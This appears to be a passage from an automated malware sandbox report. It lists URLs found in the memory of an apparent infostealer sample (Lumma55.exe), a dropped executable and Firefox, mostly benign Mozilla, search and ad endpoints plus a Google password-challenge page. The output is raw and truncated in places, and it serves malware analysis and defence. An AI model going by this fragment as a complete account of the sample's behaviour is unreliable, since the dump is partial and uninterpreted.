Source: firefox.exe, 00000018.00000002.2828915424.000001DE0019E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulcreateNotificationMessageElement/setAle
Source: firefox.exe, 00000018.00000002.2828915424.000001DE0019E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2828915424.000001DE001DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulhttp://www.mozilla.org/keymaster/gateke
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulonsetup/toggleClosedCaption/this._hideC
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00126000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource:///modules/sessionstore/Sessio
Source: firefox.exe, 00000018.00000002.2885513131.000001DE05915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://gre/modules/AppMenuNotificat
Source: Lumma55.exe, 00000006.00000003.2551771818.000000000575E000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2636386534.0000000005A72000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2774573712.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2887047262.000001DE05BC6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2929242704.000001DE075D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: Lumma55.exe, 00000006.00000003.2551771818.000000000575E000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2636386534.0000000005A72000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2774573712.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2887047262.000001DE05BC6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2929242704.000001DE075D7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 00000018.00000002.2861243955.000001DE03E30000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000003.2745774413.000001DE03900000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2745992969.000001DE03B1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2746558271.000001DE03B77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2746356946.000001DE03B5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2746175377.000001DE03B3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: Lumma55.exe, 00000006.00000003.2503075163.0000000005738000.00000004.00000800.00020000.00000000.sdmp, Lumma55.exe, 00000006.00000003.2502925594.000000000574F000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2587667241.0000000005A8B000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2587530351.0000000005A8D000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2721841637.000000000550A000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2721611289.000000000550C000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2722108061.000000000550A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 00000018.00000002.2907746771.000001DE07293000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.c
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.ca
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.caWEBEXT_BACKGROUND_PAGE_LOAD_MSprivacy.rejectForeign.allowListgetCommandS
Source: firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com
Source: firefox.exe, 00000018.00000002.2830156182.000001DE00D3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 00000018.00000002.2940438260.000001DE0C03D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.comK
Source: firefox.exe, 00000018.00000002.2940438260.000001DE0C01E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2890541633.000001DE06003000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2822160410.0000002FB0FD8000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000018.00000002.2836301934.000001DE01BA2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2828915424.000001DE00103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.orgupgradeTabsProgressListenerremoveTabsProgressListenerwidget.use-xdg-deskto
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2878398866.000001DE049EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 00000018.00000002.2830156182.000001DE00D3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2960896422.00002889A0204000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 00000018.00000002.2954557391.000001DE74011000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00103000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2814963733.000001DE0C0E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: firefox.exe, 00000018.00000002.2960896422.00002889A0204000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://baidu.com
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: Lumma55.exe, 00000006.00000003.2576465014.0000000005728000.00000004.00000800.00020000.00000000.sdmp, Lumma55.exe, 00000006.00000003.2576887838.000000000572D000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2638006118.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2830156182.000001DE00D3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F7AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2733836860.000001DE7F7B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2825914100.00000213323C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2824054861.00000175A80E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: Lumma55.exe, 00000006.00000003.2577839008.0000000005728000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&k
Source: Lumma55.exe, 00000006.00000003.2576465014.0000000005728000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2638006118.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2830156182.000001DE00D3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F7AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2733836860.000001DE7F7B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2825914100.00000213323C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2824054861.00000175A80E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: firefox.exe, 00000018.00000002.2830156182.000001DE00D3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2888287606.000001DE05D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2888287606.000001DE05D17000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180
Source: firefox.exe, 00000018.00000002.2828915424.000001DE001AF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1238180chrome
Source: firefox.exe, 00000018.00000002.2930838640.000001DE07899000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 00000018.00000002.2930838640.000001DE07899000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 00000018.00000002.2930838640.000001DE07899000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 00000018.00000002.2930838640.000001DE07899000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: Lumma55.exe, 00000006.00000003.2503075163.0000000005738000.00000004.00000800.00020000.00000000.sdmp, Lumma55.exe, 00000006.00000003.2502925594.000000000574F000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2587667241.0000000005A8B000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2587530351.0000000005A8D000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2721841637.000000000550A000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2721611289.000000000550C000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2722108061.000000000550A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Lumma55.exe, 00000006.00000003.2503075163.0000000005738000.00000004.00000800.00020000.00000000.sdmp, Lumma55.exe, 00000006.00000003.2502925594.000000000574F000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2587667241.0000000005A8B000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2587530351.0000000005A8D000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2721841637.000000000550A000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2721611289.000000000550C000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2722108061.000000000550A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Lumma55.exe, 00000006.00000003.2503075163.0000000005738000.00000004.00000800.00020000.00000000.sdmp, Lumma55.exe, 00000006.00000003.2502925594.000000000574F000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2587667241.0000000005A8B000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2587530351.0000000005A8D000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2721841637.000000000550A000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2721611289.000000000550C000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 0000000A.00000003.2722108061.000000000550A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 00000018.00000002.2861243955.000001DE03E30000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000003.2745774413.000001DE03900000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2745992969.000001DE03B1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2746558271.000001DE03B77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2746356946.000001DE03B5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2828915424.000001DE0017C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2746175377.000001DE03B3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://content.cdn.mozilla.net
Source: Lumma55.exe, 00000006.00000003.2576465014.0000000005728000.00000004.00000800.00020000.00000000.sdmp, Lumma55.exe, 00000006.00000003.2576887838.000000000572D000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2638006118.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2830156182.000001DE00D3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F7AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2733836860.000001DE7F7B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2825914100.00000213323C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2824054861.00000175A80E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: Lumma55.exe, 00000006.00000003.2576465014.0000000005728000.00000004.00000800.00020000.00000000.sdmp, Lumma55.exe, 00000006.00000003.2576887838.000000000572D000.00000004.00000800.00020000.00000000.sdmp, 8e3ce0163b.exe, 00000008.00000003.2638006118.0000000005A50000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2830156182.000001DE00D3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F7AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2733836860.000001DE7F7B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2956659069.000001DE7F743000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2825914100.00000213323C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2824054861.00000175A80E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 00000018.00000002.2942010077.000001DE0C09D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2874879961.000001DE047F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 00000018.00000003.2814963733.000001DE0C0D9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2885513131.000001DE0593C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2940438260.000001DE0C00E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2814963733.000001DE0C0BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2880310530.000001DE05603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 00000018.00000002.2954557391.000001DE74030000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 00000018.00000003.2812061768.000001DE0BF58000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2939078844.000001DE0BF57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2809101193.000001DE0BF5A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 00000018.00000002.2838875491.000001DE02180000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2828870277.0000021332430000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823236454.00000175A7F80000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 00000018.00000002.2889518477.000001DE05F58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabMozRequestFullSc
Source: firefox.exe, 00000018.00000002.2866748757.000001DE04360000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabPlease
Source: firefox.exe, 00000018.00000002.2889518477.000001DE05F58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
Source: firefox.exe, 00000018.00000002.2866748757.000001DE04360000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureOffscreenCanvas.toBlob()
Source: firefox.exe, 00000018.00000002.2866748757.000001DE04360000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureRequest
Source: firefox.exe, 00000018.00000002.2889518477.000001DE05F58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureElementReleaseCaptureWarning
Source: firefox.exe, 00000018.00000002.2866748757.000001DE04360000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureInstallTrigger.install()
Source: firefox.exe, 00000018.00000002.2889518477.000001DE05F58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#EncryptionPreventDefaultFromP
Source: firefox.exe, 00000018.00000002.2866748757.000001DE04360000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryptiondocument.requestSto
Source: firefox.exe, 00000018.00000002.2828915424.000001DE00103000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
